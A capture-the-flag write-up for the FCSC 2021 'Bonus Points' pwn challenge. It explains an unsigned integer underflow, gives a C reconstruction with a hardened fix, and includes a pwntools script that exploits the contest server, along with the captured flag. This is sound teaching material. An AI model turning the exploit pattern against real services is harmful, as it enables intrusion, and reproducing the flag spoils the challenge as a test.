FCSC 2021 - Intro - Bonus Points

May 03, 2021   
pwn writeup 
Also available in:  🇫🇷 


Challenge

Who doesn't want a few bonus points? Get a score above 1000 to unlock the flag.

nc challenges2.france-cybersecurity-challenge.fr 4001

SHA256(bonuspoints) = 8c05bb6a86ea741b6af1412ae0da562513345e00ad2096fd41bdd83f984b4b64.

Files: bonuspoints


Solving the challenge

The vulnerability here is an unsigned integer wraparound (an underflow). The score is stored as a 32-bit unsigned integer, and the only check rejects requests for more than 100 bonus points; nothing stops us from entering a negative number, and the magnitude of a negative number is not limited. Subtracting our current score takes us to 0, and subtracting one more point wraps the score around to 0xffffffff (4294967295), which is comfortably above 1000. Local example:

$ ./bonuspoints
Hello, here you can get some bonus points for the competition.
You cannot get more than 100 bonus points.
If you go above 1 000 you win.
Your score is currently 43
How many bonus points do you want ?
>>> -44
Your new score is 4294967295
Congratulations ! Here is your flag :
cat: flag.txt: No such file or directory

The score becomes 4294967295 (0xffffffff in hex), which passes the "above 1000" test. The binary then runs cat flag.txt to print the flag; there is no flag.txt locally, hence the cat: flag.txt: No such file or directory error.
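As an added illustration, and not code from the challenge (its source is not on this page), here is a hypothetical C reconstruction of the faulty check next to a hardened version. The names apply_bonus_vulnerable, apply_bonus_fixed, wins, MAX_BONUS and WIN_SCORE are assumptions; the score is modelled as a uint32_t because the wrapped value 4294967295 is 2^32 - 1.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

#define MAX_BONUS 100   /* assumed: "You cannot get more than 100 bonus points." */
#define WIN_SCORE 1000  /* assumed: "If you go above 1000 you win." */

/* Hypothetical reconstruction of the vulnerable logic. The bonus is read as a
 * signed int, but only the upper bound is checked, so negative values reach
 * the unsigned addition. */
uint32_t apply_bonus_vulnerable(uint32_t score, int bonus)
{
    if (bonus > MAX_BONUS)
        return score;               /* request rejected, score unchanged */

    /* bonus is converted to uint32_t for the addition: -44 becomes
     * 4294967252, and 43 + 4294967252 = 4294967295 = UINT32_MAX. */
    return score + (uint32_t)bonus;
}

/* Hardened version: reject negative input before any conversion, and also
 * refuse an addition that would wrap past UINT32_MAX. Returns false when the
 * request is rejected; *out is only written on success. */
bool apply_bonus_fixed(uint32_t score, int bonus, uint32_t *out)
{
    if (bonus < 0 || bonus > MAX_BONUS)
        return false;
    if (score > UINT32_MAX - (uint32_t)bonus)   /* would wrap */
        return false;
    *out = score + (uint32_t)bonus;
    return true;
}

/* The challenge's win condition. */
bool wins(uint32_t score)
{
    return score > WIN_SCORE;
}

int main(void)
{
    uint32_t start = 43;            /* the score from the local run above */
    uint32_t after = apply_bonus_vulnerable(start, -44);
    printf("vulnerable: %u + (-44) -> %u, win=%d\n", start, after, wins(after));

    uint32_t fixed = 0;
    bool ok = apply_bonus_fixed(start, -44, &fixed);
    printf("fixed: -44 accepted=%d\n", ok);
    return 0;
}
```

Note that unsigned wraparound is defined behaviour in C, so UBSan does not report it by default; the bound has to be checked explicitly, and the sign check must happen while the value is still signed, before it is mixed with the unsigned score.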

Remote exploitation

To exploit the binary through the provided network service I used pwntools. The starting score is random, so the script first reads it from the banner and then requests -(score + 1) bonus points.

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import re
import pwn

c = pwn.remote("challenges2.france-cybersecurity-challenge.fr", 4001)

# Read the banner up to the prompt; pwntools returns bytes, so we parse bytes.
data = c.recvuntil(b">>>")

# Extract the random starting score from "Your score is currently N".
currentscore = int(re.search(rb"is currently (\d+)", data).group(1))

# Ask for -(score + 1): only values above 100 are rejected, and the unsigned
# score wraps from 0 to 0xffffffff.
exploit_score = -(currentscore + 1)
c.sendline(str(exploit_score).encode())
c.interactive()

Running the script gives:

$ ./solve.py
[+] Opening connection to challenges2.france-cybersecurity-challenge.fr on port 4001: Done
Hello, here you can get some bonus points for the competition.
You cannot get more than 100 bonus points.
If you go above 1000 you win.
Your score is currently 77
How many bonus points do you want?
>>>
-78
[*] Switching to interactive mode
Your new score is 4294967295
Congratulations! Here is your flag:
FCSC{750882cf64feb04b384cfa42bbf2167eab337671e663ab238339c6cee884851d}
[*] Got EOF while reading in interactive
$  

And we get the flag:

FCSC{750882cf64feb04b384cfa42bbf2167eab337671e663ab238339c6cee884851d}